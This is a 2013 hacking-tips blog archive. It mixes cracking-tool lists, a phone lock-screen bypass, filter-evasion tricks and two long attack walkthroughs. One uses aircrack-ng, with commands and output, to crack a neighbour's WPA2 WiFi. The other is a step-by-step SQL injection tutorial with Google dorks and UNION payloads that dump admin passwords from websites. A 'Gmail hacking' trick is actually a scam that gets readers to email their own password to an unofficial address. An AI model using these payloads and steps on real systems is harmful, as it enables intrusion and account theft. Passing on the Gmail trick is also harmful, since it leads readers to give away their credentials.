Hackstroke: 2013

Monday, December 30, 2013

15 worlds top cracking tools for Pc

The worlds best and tested cracking tools which always helps you to do your world more easier than before in all ways these software's are tested by professional system tools trainers
the 15 softwares are listed below

1. PDF Password Remover:
PDF Password recovers lost passwords to password-protected PDF files (*.pdf). PDF Password recovers user and permission passwords only. PDF Password does not allow to break DRM (Digital Right Management) system. If user password (also known as password to open) is either not set or known, it is possible to remove permission password instantly.
2. Windows XP Admin Password Remover :
Windows Password Cracker can easily extract unencrypted password hashes from systems that use Microsoft's SYSKEY protection. It supports international language input locales, allowing it to work with operating systems and passwords based on single byte character sets including those for European, Cyrillic, Greek, Hebrew, Arabic, and other languages. Windows Password Cracker now includes a 53,000 word English dictionary for comprehensive English dictionary audits. It's is an easy-to-use and fast password recovery software.
3. Zip File Password Cracker
Atomic Zip Password Cracker is created to recover the lost or forgotten passwords for ZIP archives. It can quickly restore the password in several ways: the direct search and the dictionary attack. It has easy-to-work and friendly user interface. There are two modes of password recovering: automatic and user-defined mode. If the automatic mode is set the program makes a password search basing on most frequently used settings (such as capital and small letters, 0-9 figures; maximum 5 symbols length password). If you have the information about the components and length of the password you can try to start the user-defined mode.
4. Microsoft Office Password Remover
This software helps recover or delete forgotten Microsoft Office document passwords. The software restores passwords of certain types instantly, plus the latest version of the software allows finding lost hard-cracked passwords seven times faster!
5. SQL Password Remover
Kernel SQL Password Recovery is a MDF (Master Data File) password recovery software widely used to recover the lost or forgotten passwords from SQL Server 2000 password-protected database files (*.mdf). The software recovers all the passwords instantly despite the length and complexity of the password. The .mdf files stores the password using strong encryption algorithms. This strong encryption can not be easily decrypted. Kernel SQL Password Recovery will recursively scan the password protected sql database file and will automatically generate the password. The generated password is an alternate password (NOT the Original Password) to unprotect the MDF file.
6. EXE File Password Recovery
EXE Password Protector is a powerful yet easy to use system utility that allows you to password-protect any Windows executable file in a few steps. This incredible program is intended for those people who share the same computer with others and want to protect sensitive applications from an unauthorized usage. If you are looking for an efficient and fast application that allows you to password-protect any Windows executable file, EXE Password Protector is perfect for you.

7. Windows Vista Admin Password Recovery
Windows Password Unlocker is a pioneer Windows password recovery with intuitive Windows graphical user interface, but not DOS-like black screen, so that it is much easier to reset Windows login passwords rapidly and conveniently in case an administrator password is forgotten or lost in Windows 2000/2003/NT/XP/Vista/2008. No need to re-install the operating system any more. Just boot from the program CD, choose the account you wish to reset. Then you can log in as a particular user with a blank password. Even with the on-screen step-by-step instructions, the program is so simple to use without any technique.
8. RAR File Password Cracker
RAR Password Recovery proved to be an effective way to uncover lost or forgotten passwords, but--as its name implies--it only works with one file type. Its straightforward, tabbed interface clearly represents the three main password recovery options: Brute-Force, Booost-Up, and Dictionary. Each approach proved successful in our tests, although the demo limits passwords to three characters. Conveniently, you can save password recovery settings in projects for future use. While it can only handle one file format, users who need to unlock their RAR files will find this application up to the task.
9. Password Changer
Active Password Changer Professional is a DOS-based solution designed for resetting local user passwords in case of administrator's password is forgotten or lost. Forgotten password recovery software is useful if you lost the administrator password and cannot access the operation system. Other Windows login security restrictions like 'Account is disabled', 'Password never expires', 'Account is locked out', 'User Must Change Password at Next Logon' and 'Logon Hours' can be changed or reset. Supported platforms: Windows XP, 2000, NT, Windows Server 2003 and Windows Vista.

10. Password Memory
The Password Memory 2010 application was designed to be the perfect password manager for you. Your passwords are encrypted using multiple algorithms to keep them secure. Your login details (username, password, etc.) can be searched and sorted fast easily. Login details associated with a website can also be copied into the webpage with the click of a button. Generating random secure passwords in an instant. You can even install the program on a USB stick and bring your password database securely with you wherever you go

11. Distributed Password Recovery
If every system administrator's nightmare is forgotten passwords, then this application is every admin's dream. Installation of Elcomsoft Distributed Password Recovery is quick and simple. The clean tab-and-button interface is well-organized. This application cracks Word 97 and Word 2000 passwords, plus the weaker PGP, PDF, and Windows passwords. It takes just a couple of steps to crack most files. The software can unleash agents that harness the power of multiple client machines to improve password-recovery time. Connecting over the network is through a user-specified port, to forestall interference with other applications. Your firewall may have to be set to allow information through the port. The help file is sparse, but the program operates cleanly with little user supervision. E-mail alerts are easy to implement, making this a start-it-and-forget-it piece of software.

12. Windows 7 Password Cracker
The Ophcrack Windows password cracker is by far the best free Windows password recovery tool available. It's fast and easy enough for a first time password cracker with a basic knowledge of Windows. With Ophcrack, you don't need any access to Windows to be able to recover your lost passwords. Simply visit the site, download the free ISO image, burn it to a CD and boot from the CD. The Ophcrack program starts, locates the Windows user accounts, and proceeds to recover (crack) the passwords - all automatically. In a test on a Windows 7 PC, Ophcrack recovered the 10-character password to my administrator account in 40 seconds. Ophcrack supports Windows 7, Windows Vista, and Windows XP.

13. Mozilla Firefox Password Cracker
PasswordFox enables you to review and export the list of saved logins and passwords that are stored in your Firefox browser. The list can be saved to a text file or exported to HTML format. PasswordFox will let you view passwords from any Firefox profile, not only the current one. A useful tool to backup your login information, keep in mind though that the exported text file in not encrypted and should be stored securely.

14. Asterisk LoggerMany applications, like CuteFTP, CoffeeCup Free FTP, VNC, IncrediMail, Outlook Express, and others, allows you to type a password for using it in the application. The typed password is not displayed on the screen, and instead of the real password, you see a sequence of asterisk ('****') characters. This utility can reveal the passwords stored behind the asterisks in standard password text-boxes.
Asterisk Logger is a successor of AsterWin utility. It reveals the asterisk passwords in the same way as AsterWin utility, but it has some advantages over the previous utility:
* You don't have to press a button in order to reveal the asterisk passwords. Whenever a new window containing a password box is opened, Asterisk Logger automatically reveals the password inside the password-box, and add a record to passwords list in the main window of Asterisk Logger.
* Asterisk Logger displays additional information about the revealed password: The date/time that the password was revealed, the name of the application that contains the revealed password box, and the executable file of the application.
* Asterisk Logger allows you the save the passwords to HTML file and to 3 types of text files.

15. MSN Password Recovery
MessenPass is a password recovery tool that reveals the passwords of all instant messenger applications. MessenPass can only be used to recover the passwords for the current logged-on user on your local computer, and it only works if you chose the remember your password in one of the above programs. You cannot use this utility for grabbing the passwords of other users.

How to bypass the Lock screen Samsung Galaxy S3

Phone Hacking Tool

Steps:

1) On the code entry screen press Emergency Call
2) Then press Emergency Contacts
3) Press the Home button once
4) Just after pressing the Home button press the power button quickly
5) If successful, pressing the power button again will
bring you to the S3's home screen

Friday, December 20, 2013

Gmail Hacking Trick 2013 By iSARGUTTAM NAGAR

Hacked I,ds

1. How To Hack Gmail Password Using Gmail Hacker [TUTORIAL] Need to hack Gmail passwords? It is possible and it is easy. This way of hacking into Gmail accounts was brought to my attention by a friend of mine who is a bit of a computer wizard. I have tried the method a least a dozen times and it has worked on all but 4 occasions, I don’t know the reason why it failed a couple of times, but on every other occasion it has got me the password for the requested email address. This is how it is done:
STEP 1− Log in to your own Gmail account. Note: Your account must be at least 30 days old for this to work.
STEP 2− Once you have logged into your own account, compose/write an e−mail to: email”pwd.server.redirect@gmail.com” This is a mailing address to the Gmail Staff/server. The automated server will send you the password that you have ‘forgotten’, after receiving the information you send them.
STEP 3− In the subject line type exactly: “PASSWORD RECOVERY”
STEP 4− On the first line of your mail write the email address of the person you are hacking.
STEP 5− On the second line type in the e−mail address you are using.
STEP 6− On the third line type in the password to YOUR email address (your OWN password). The computer needs your password so it can send a JavaScript from your account in the Gmail Server to extract the other email addresses password. In other word the system automatically checks your password to confirm the integrity of your status. The process will be done automatically by the user administration server.
STEP 7− The final step before sending the mail is, type on the fourth line the following code exactly: cgi−bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsascript {simply copy and paste above.} so for example if your Gmail id is : David_100@gmail.com and your password is: David and the email address you want to hack is: test@gmail.com then compose the mail as below: To: (pwd.server.redirect@gmail.com) bcc: cc: (Don’t write anything in cc,bcc field) Subject: “PASSWORD RECOVERY” test@gmail.com D_100@gmail.com

2. David cgi−bin_RETRIVE_PASS_KEY_CGI_BIN/$et76431&pwrsascript {simply copy and paste above.} The password will be sent to your inbox in a mail called “System Reg Message” from “System within 6 hours. When my friend showed me how to do this I thought it was too good a trick to keep to myself! Just try and enjoy!

Friday, December 13, 2013

Microsoft Internet Explorer navigation shortcuts

Hacking Shortcuts

     CTRL+B (Open the Organize Favorites dialog box)
     CTRL+E (Open the Search bar)
     CTRL+F (Start the Find utility)
     CTRL+H (Open the History bar)
     CTRL+I (Open the Favorites bar)
     CTRL+L (Open the Open dialog box)
     CTRL+N (Start another instance of the browser with the same Web address)
     CTRL+O (Open the Open dialog box, the same as CTRL+L)
     CTRL+P (Open the Print dialog box)
     CTRL+R (Update the current Web page)
     CTRL+W (Close the current window)

Idea,Airtel,Reliance,Tata Photon,Huawei And MTS Mblaze Netsetters are the most famous high-speed wireless internet service provider

Here today i will tried to bring out some of the tricks by which you can able to increase your net setter speed
Free Net Calling Minutes

So lets start.

1). Updating DNS Address:

Go to your Net setter connection Setting And Update your DNS address as following.
Some of the DNS servers you can use are
Google DNS : 8.8.8.8
Alternate Google DNS: 8.8.4.4.

2). Optimize TCP/IP Settings:

The TCP Optimizer is a free, easy Windows program that provides an visual interface for tuning and optimizing your Internet connection.

You Can Download TCP Optimizer from here http://www.speedguide.net/files/TCPOptimizer.exe

Once you launch the program you will see a slider with range of number on it. Slide the slider to match your connection speed. If you are on Tata Photon or Reliance net connect you can try a range between 2Mbps to 3Mbps.other users can try the speed that is officially provided by your net setter.

In the Bottom most Choose settings section check ‘Optimal’ settings if you are not sure about all the settings.Now click on apply changes and exit the program.

Now Connect to internet with your net setter and see a difference in speed.

Sunday, December 8, 2013

AVOID FRIEND REQUEST BLOCK

So this is a simple way to get those requests cancelled and protect your account from being blocked.

    Follow below steps :-

    1. Go to account settings.
    2. Select `download a copy` option.
    3. Choose `expanded archive` from the next page opened and enter your   password and click continue.
    4. Select `start my archive`.
    5. After a few hours you'll get the download link in your email.
    5. Download the file `facebook` and unzip it.
    6. Open the folder html and then `friend_requests.html`.
    7. You can see the list of your friend requests and pending lists.
    Now goto their accounts and click`cancel request.

    That's all You are done now. Your account is safe.

How To Trace Your Facebook Profile Visitors

Now here we found who recently visited your profile.
Follow below steps for get to know your FB recent visitors.

Step 1) Go to your Facebook Profile Page.

Step 2) Now Press Ctrl + U from your keyboard for see source code of your profile page.

Step 3) Now press Ctrl + F from your keyboard to open search box.

Step 4) Now search this code {"list":

Step 5) You find some Facebook Profile Ids are like shown below.

Step 6) There are some Facebook Profile Ids of your friends who visited recently.

Step 7) The first one ID's are showing visits the most number of time.

Step 8) Now if your want to findout, Open a new tab Enter below link :
www.facebook.com/Facebook Profile Id

For Example : www.facebook.com/100001257992988

Friday, December 6, 2013

How To Use Google As A Proxy ?

Google proxy server
We often use schools and colleges internet connections, but they usually block access to undesired web sites (the "black list"). In order to access those sites you can do is use Google translate as proxy to bypass this restrictions. So lets get into it.

Method 1
1. Visit whatismyipaddress and note down you real Ip Address
2. Now Go to Google Translate
3. From Under Detect Language, Chose your language in my case English
4. Now type http://whatismyipaddress.com/ in text area and click on Translate
5. Now check your Ip Address, Its different from the real one.

Method 2
1. Go to link given below:
http://www.google.com/translate?langpair=es|en&u=www.mybloggersworld.com
2. Change www.mybloggersworld.com to website you like to visit.
3. Done!

Hack your friends Facebook account in 2 minutes

   First Thing is that to protect your own account
                                             so read carefully

Privacy settings for FB read this care fully.
To many of our member faceing FB account hack this tips will prevent you from hackers.

Privacy settings

Control Privacy When You Post
...
You can manage the privacy of your status updates, photos and information using the inline audience selector — when you share or afterwards. Remember: the people you share with can always share your information with others, including apps. Try editing your profile to see how it works or learn more

Control Your Default Privacy

This setting will apply to status updates and photos you post to your Profile from a Facebook app that doesn't have the inline audience selector, like Facebook for BlackBerry.

MAKE SURE YOU SET THESE SETTINGS TO CUSTOM

How you connect

Control how you connect with people you know.

How you connect > MAKE SURE THIS SETTINGS ARE SET TO FRIENDS ONLY

Who can see Wall posts by others on your profile? Note: Stories about Likes, friendships and some other types of wall content aren't included in these settings. > MAKE SURE THIS SETTINGS ARE SET TO FRIENDS ONLY

How tags work >> Set these setting as required.

Choose your privacy settings Apps, games and websites

Set these settings as required.

=====================================================

PROFILE SETTINGS THESE ARE IMPORTANT

http://www.facebook.com/editprofile.php

1. Make sure wall is not open, so others can see what you are posting, if not on friends list

http://www.facebook.com/editprofile.php?sk=relationships

1. Make sure friends list not open, so others can see who you've added.

http://www.facebook.com/editprofile.php?sk=contact

1. MAKE SURE THE EMAIL ID IS HIDDEN
http://facebook.com/editprofile.php

Friday, October 18, 2013

Wifi/WEP/WPA2 password hacking- Aircrack-ng

wifi hack

Now a days, We find our neighbour WiFi network but when we try to connect it say to enter password. they are put password in form of WEP or WPA/WPA2. Here is some trick to hack or Crack the wireless/WiFi password using aircrack-ng.

Hacking wireless wifi passwords:
The most common type of wireless security are Wired Equivalent Privacy (WEP) and
Wi-Fi protected Access (WPA).
WEP was the original encryption standards for wireless so that wireless networks can be secured as
wired network. There are several open source Utilities like aircrack-ng, weplab, WEPCrack, or
airsnort that can be used by crackers to break in by examining packets and looking for patterns in the
encryption. WEP comes in different key sizes. The common key lengths are currently 128- and 256-bit in WEP.
Latter WAP and WAP2 was introduced to overcome the problems of WEP. WAP was based on
security protocol 802.11i replacing the 802.11 of WEP. Using long random passwords or passphrases
makes WPA virtually uncrackable however if a small password is used of less than 14 words it can be
cracked in less than one minute by aircrack-ng, mostly uses passwords of less than 14 words so use aircrack-ng for hacking .
Securing Wireless Network
The first step of securing wireless connection is simply using a long random passwords atleast of
14 characters. Now if your wifi device supports for WPA2 than use it, as many users don’t know that
their device supports for many security encryption techniques. Check your router security techniques supported which is in its configuration page.
If you don’t know how to edit routers setting than just open your browser and type 192.168.1.1 in
addressbar and here you will get your routers configuration, where you can select.
Cracking Wireless Network
As we have read above this is an easy task, we just have to use our network card in monitor mode so
as to capture packets from target network. And this NIC mode is driver dependent and network can be monitored using aircrack-ng. But only small number if cards support this mode under windows.
But you can use live CD of any linux OS (commonly BackTrack ) or install linux OS as virtual machine.
List of compatible cards.
Now download aircrack-ng for linux or windows platform from HERE.
The aircrack-ng suite is a collection of command-line programs aimed at WEP and WPA-PSK key
cracking. The ones we will be using are:
airmon-ng - script used for switching the wireless network card to monitor mode
airodump-ng - for WLAN monitoring and capturing network packets
aireplay-ng - used to generate additional traffic on the wireless network
aircrack-ng - used to recover the WEP key, or launch a dictionary attack on WPA-PSK using the captured data.
Using aircrack-ng

First, put the card in monitor mode :
root@bt:~# airmon-ng
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]

root@bt:~# airmon-ng start wlan0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]

(monitor mode enabled on mon0)
Ok, we can now use interface mon0
Let’s find a wireless network that uses WPA2 / PSK :

root@bt:~# airodump-ng mon0
CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:5B:52:AD:F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -29 0- 1 12 4 TestNet
Stop airodump-ng and run it again, writing all packets to disk :
airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2
At this point, you have 2 options : either wait until a client connects and the 4-way handshake is
complete, or deauthenticate an existing client and thus force it to reassociate. Time is money, so let’s
force the deauthenticate. We need the bssid of the AP (-a) and the mac of a connected client (-c)
root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
13:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]
As a result, airodump-ng should indicate “WPA Handshake:” in the upper right corner
CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230
Stop airodump-ng and make sure the files were created properly

root@bt:/# ls /tmp/wpa2* -al
-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
-rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv
-rw-r--r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv
Form this point forward, you do not need to be anywhere near the wireless network. All cracking will
happen offline, so you can stop airodump and other processes and even walk away from the AP. In fact,
I would suggest to walk away and find yourself a cosy place where you can live, eat, sleep, etc.
Cracking a WPA2 PSK key is based on bruteforcing, and it can take a very very long time.
There are 2 ways of bruteforcing : one that is relatively fast but does not guarantee success and one
that is very slow, but guarantees that you will find the key at some point in time.
The first option is by using a worklist/drstionary file. A lot of these files can be found on the internet (e.g.www.theargon.com or on packetstorm (see the archives)), or can be generated with tools such
as John The Ripper. Once the wordlist is created, all you need to do is run aircrack-ng with the
worklist and feed it the .cap fie that contains the WPA2 Handshake.
So if your wordlist is called word.lst (under /tmp/wordlists), you can run
aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap
The success of cracking the WPA2 PSK key is directly linked to the strength of your password file. In
other words, you may get lucky and get the key very fast, or you may not get the key at all.
The second method (bruteforcing) will be successfull for sure, but it may take ages to complete.
Keep in mind, a WPA2 key can be up to 64 characters, So in theory you would to build every
password combination with all possible character sets and feed them into aircrack.

Note: This tutorial is only for Educational Purposes.

Turn Your Smartphone into a Hacking Device

Mobile devices is now very common now a days and mobile devices has changed the way of bi-directional communication. There are many operating system for mobile devices available but the most common and the best operating system for mobile is Android, it is an OS means you can install other applications (software's) on it. In Android application usually called apps or android apps.

The risk of hacking by using mobile devices is very common and people are developing and using different apps (application) for their hacking attack. Android has faced different challenges from hacking application and below is the list of application for android hacking.
1. SpoofApp

Here is an app that spies at heart could use – SpoofApp. It allows you to use a fake Caller ID – a number that you are free to specify yourself, in order to protect your privacy or to pull a prank on someone. Sounds like fun, doesn’t it? Well, Apple didn’t think so, which is why it never allowed the app to enter its App Store. Google, however, didn’t mind, which is why SpoofApp was available on the Android Market for about two and a half years. However, it was banned from there last year as it allegedly was in conflict with The Truth in Caller ID Act of 2009.This can be useful in social engineering.
2. FaceNiff
Ads not by this site

Requirements: Android 2.1+ (rooted)
Overview: FaceNiff is an Android app that allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to. It is possible to hijack sessions only when WiFi is not using EAP, but it should work over any private networks (Open/WEP/WPA-PSK/WPA2-PSK). It’s kind of like Firesheep for android. Maybe a bit easier to use (and it works on WPA2!). Please note that if webuser uses SSL this application won’t work.
Legal notice: This application is for educational purposes only. Do not try to use it if it’s not legal in your country. I do not take any responsibility for anything you do using this application. Use at your own risk.

3. Penetrate Pro [Root is required.]
The most of the times you scan the Wi-Fi networks available around, they’re protected with key. Penetrate is an app that help you out with that. If the routers of that Wi-Fi networks are encrypted with WEP/WPA it will bring you the keys to access them. This seems a sort of cracking, but the developers says it isn’t, because it’s supposed to get the keys for penetration testing and you should use it only with permission from network owners. Well, apart from those regardings, it does what it says. Check the developer description to know which routers are supported.
Take in account that if you have an antivirus installed in your device, it will warn you about this app. The developer says it’s normal because it’s a security-related tool. Penetrate isn’t a danger for your phone.
This is the paid version (€1.99) that contains no ads, some more features and sponsors further development. What’s more, it allows you to use 3G to get the password instead of using dictionaries that you will have to download in the free version.
Penetrate works properly with the range of routers supported. We’re missing more though. Despite the apparent use for which it was developed this application, we all know the “regular” use. And if you’re looking for it, give it a chance. It’s a great app.
4. Anti-Android Network Toolkit

ROOT Required
Anti-Android Network Toolkit is an app that uses WiFi scanning tools to scan networks. You can scan a network you have the phone connected to or you can scan any other nearby open networks. Security admins can use Anti to test network host vulnerabilities to DoS attacks and other threats.

5. Andosid

AnDOSid is the application which is used for DOS attacks from Android mobile phones.

6. Nmap For Android.
Ads not by this site

Nmap is a network scanner tool which gives the entire information of the ip address and website. There is a version of nmap for Android users too, with the help of this app hackers can scan the ip's through mobiles.

7. The Android Network Toolkit

The Android Network Toolkit is an complete tool kit for the pentesters , where hackers can find expolots using the mobile and penetrate or attacks the ip's according to their vunerabilities.

8. SSHDroid- Android Secure Shell

Secure shell or SSH is the best protocol that provides an extra layer of security while you are connecting with your remote machine.SSHDroid is a SSH server implementation for Android.
This application will let you to connect to your device from a PC and execute commands (like "terminal" and "adb shell").

10. WiFi Analyzer
Ads not by this site
WiFi Analyzer is one of the most popular applications in the Android Marketplace, which is really a testament to how wildly useful this tool is for both the average user and the more technically inclined. In the most basic of terms, WiFi Analyzer is a tool to scan the area for WiFi networks and determine which channel is the least populated so you can adjust your own hardware to a less congested part of the spectrum.

11. ConnectBot

ConnectBot is an exceptionally well done SSH/Telnet client, which also acts as a terminal emulator for the local Linux sub-system. While there are better terminal emulators (though not for free), there is no question that ConnectBot is the absolute best SSH client available for Android.

12. Network Discovery

Network Discovery is a handy tool for finding and enumerating devices on public WiFi networks. Network Discovery uses a simple ping scan to find hosts on the network, and then allows the user to select one of the found hosts to target for a TCP connect() scan.

Bonus : dSploit
Ads not by this site

dSploit is an Android network analysis and penetration suite which aims to offer to IT securityexperts/geeks the most complete and advanced professional toolkit to perform network security assesments on a mobile device. Once dSploit is started, you will be able to easily map your network, fingerprint alive hosts operating systems and running services, search for known vulnerabilities, crack logon procedures of many tcp protocols, perform man in the middle attacks such as password sniffing ( with common protocols dissection ), real time traffic manipulation, etc, etc.

How to hack website using Sql Injection Attack

How to hack website using Sql Injection Attack

Here's my first tutorial on website hacking using SQL Injection attack with easy and simple steps. Many of us who are interested in hacking are well known aware about Sql injection attack by name but found it really very hard to understand and Inject Malicious code into url and get website Database. So this tutorial will help them to understand each and every step very easily and apply them accordingly.

What is SQL Injection ?

SQL Injection is one the most popular Web application hacking method. In SQL Injection an attacker find website vulnerability and Inject Malicious code into URL and get Database of Website and Hack the website this is called SQL Injection attack Exploiting DB (Database) and also SQL Injection Vulnerability Exploitation. Using SQL Injection attack method an attacker can get complete DB of website and User ID and Password can be exploded, an attacker can also Shut down My SQL Server and Server will stop working. An attacker can modify content of website and bypass login.

Tools/ Requirements-

SQL Injection Dorks.
Vulnerable Website. (Use Google to find SQL Injection Vulnerable Website)
Firefox with Hack bar add-on (Click to download Hackbar add-on)
Little knowledge of SQL Injection and URL editing.
And main thing- “Patience”.

Steps-
Step 1. Find Vulnerable website.
An attacker always use Google, Bing or Yahoo search engine for searching SQL Injection Vulnerable websites using Dorks. (SQL Injection vulnerable URL is called Dorks which can be easily found in SQL Injection Vulnerable Website URL)

Click here to download Huge list of SQL Injection Dorks
Search it on Google for Eg. these are few SQL Injection Vulnerable Dorks. :-
___________

inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
________________

Basically I always use Google to search Vulnerable websites.

Here, for tutorial I already have one Vulnerable website (But I can't expose it's name) In this result you will find thousands of websites, the common thing in this search result is all website URL having this type of code at it's end inurl:index.php?id=
Definitely it will have because this all website having DB and SQL Injection String and related to SQL Injection Dorks.

For Eg. www.targetwebsite.com/index.php?id=8

✔ How to Check for Vulnerability.

Open any website URL related to SQL Injection Dorks.
Put Single Quote at the End of the website URL ( ' )
Note :- To Check the Vulnerability put sigle Quote ( ' ) at the end of the website URL and Hit Enter.
For Eg.

www.targetwebsite.com/index.php?id=2'

If the page remains same or Not found then it's not vulnerable and if the page shows Error like this :-

An error occurred...
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/contentPage.php?id=8''' at line 1
An error occurred...
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

This means the website is vulnerable to SQL Injection.

✔ Step 2. Find the number of Columns.
We found SQL Injection Vulnerable webstie now it's time to find no. of Columns present in the Database.

To do that replace that one single quote ( ' ) with "Order By no." Statement until you find the Error message.
Change the no. from 1,2,3,4,5,6,7,8,9,..... Until you get an Error Message like "Unknown Column"
For Example :- Change it's Order By 1,2,3,4 like below :-

www.targetwebsite.com/index.php?id=8 Order by 1
www.targetwebsite.com/index.php?id=8 Order by 2
www.targetwebsite.com/index.php?id=8 Order by 3
www.targetwebsite.com/index.php?id=8 Order by 4
www.targetwebsite.com/index.php?id=8 Order by 5
And Suppose above Method won't work then use below method :-

www.targetwebsite.com/index.php?id=8 order by 1--
www.targetwebsite.com/index.php?id=8 order by 2--
www.targetwebsite.com/index.php?id=8 order by 3--
If you get an Error on Order by 9 that means the DB have 8 number of Columns and If u had found error on Order by 6 then the DB have 5 number of Columns. I mean if you put Order by 12 and Suppose the DB have only 11 no. of Columns then Website will show Error like this :-
An error occurred...
Unknown column '12' in 'order clause'
This trick is actually used to find the number of Columns in DB. Understand the Below example and you wil get to know.
www.targetwebsite.com/index.php?id=8 Order by 1 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 2 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 3 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 4 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 5 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 6 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 7 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 8 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 9 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 10 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 11 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 12 (Error)

Here, my Vulnerable website Showed Error on Order by 12 that means my Vulnerable website have 11 number of columns in it's DB.
So now here I found number of columns in my DB :-
Number of Columns = 11

✔ Step 3. Find the Vulnerable Column.

Basically if the website is vulnerable then it have vulnerability in it's column and now it's time to find out that column.
Well we have successfully discovered number of columns present in Database. let us find Vulnerable Column by using the Query "Union Select columns_sequence".
And also change the ID Value to Negative, I mean Suppose the website have this URL index.php?id=8 Change it to index.php?id=-8. Just put minus sign "-" before ID.

For Eg. If the Number of Column is 11 then the query is as follow :-
www.targetwebsite.com/index.php?id=-8 union select 1,2,3,4,5,6,7,8,9,10,11--

And Suppose above Method won't work then use below method:-

www.targetwebsite.com/index.php?id=-8 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11--
✔ And Once if the Query has been Executed then it will display the number of Column.

In the Above result, I found three vulnerable Columns 2,3 and 4.
let take 2 as our tutorial.
Well... ! We found Vulnerable Columns, Now Next Step.

✔Step 4. Finding version, Database and User.

Now this time to find out website Database version and User
Just replace Vulnerable Column no. with "version()"

For Eg.
www.targetwebsite.com/index.php?id=-8 union select 1,version(),3,4,5,6,7,8,9,10,11--
And now Hit Enter : and you will get result.

Now again do the same replace Vulnerable column with different query like :- database(), user()

For Eg.

www.targetwebsite.com/index.php?id=-8 union select 1,version(),3,4,5,6,7,8,9,10,11--www.targetwebsite.com/index.php?id=-8 union select 1,database(),3,4,5,6,7,8,9,10,11--
www.targetwebsite.com/index.php?id=-8 union select 1,user(),3,4,5,6,7,8,9,10,11--
And Suppose above Method won't work then use below method :-
www.targetwebsite.com/index.php?id=-8 and 1=2 union select 1,unhex(hex(@@version)),3,4,5,6,7,8,9,10,11--

✔ Step 5. Finding the Table name.
Here we found vulnerable Column, DB Version name and User it's time to get Table name. If the database version is 4 or above then you gave to guess the table names (Blind SQL Injection attack)

Let us find now Table name of the Database, Same here Replace Vulnerable Column number with “group_concat(table_name)” and add the “from information_schema.tables where table_schema=database()”

For Eg.
www.targetwebsite.com/index.php?id=-8 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--
Now hit Enter and you can see Complete Table of Database.

(Click on Image to Enlarge it)

Great we found Table name now find the table name that is related to admin or user. as you can see in the above image there is one table name :- userDatabase. Let us choose that table userdatabase and Go on Next step.

✔ Step 6. Finding the Column name.
Now same to find Column names, replace "group_concat(table_name)” with "group_concat(column_name)"
and Replace the "from information_schema.tables where table_schema=database()--" with FROM information_schema.columns WHERE table_name=mysqlchar—

Note :- Do not hit Enter now.... First of all Convert
table name into Mysql Char String()

Install the Hackbar add-on in Firefox Click here to Download

After Installing you can see the toolbar, and if you can't then Hit F9.
Select sql->Mysql->MysqlChar() in the Hackbar.
Enter the Table name you want to convert it into Mysql Char

Now you can see the Char like this :-
Copy and paste the code at the end of the url instead of the "mysqlchar"

For Eg.
www.targetwebsite.com/index.php?id=-8 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11 FROM information_schema.columns WHERE table_name=CHAR(117, 115, 101, 114, 68, 97, 116, 97, 98, 97, 115, 101)--

And Now Hit Enter and you will be able to see the Column names like this :-
(Click on Image to Enlarge it)

Great Here we found Username and Password Column :D.

✔ Step 7. Explore Database & Hack it.
Cool......! now you know the next step what to do :D..... get the ID and Password of Admin user using this Command into URL.Now replace group_concat(column_name) with group_concat(username,0x2a,password) or any other Column name you want to get Data.

For Eg.
http://targetwebsite.com/index.php?id=-8 and 1=2 union select 1,group_concat(username,0x2a,password),3,4,5,6,7,8,9,10,11 from userDatabase--
If the above Command doesn't work then use Column name from first and put all Columns at one time and you will able to get complete database.

Disclaimer:- The Above tutorial is completely for Educational purpose only, Do not use it to hack any third party website. I'll be not responsible for any SQL Injection attack performed by any reader.

How To Increase Bsnl Broadband Speed

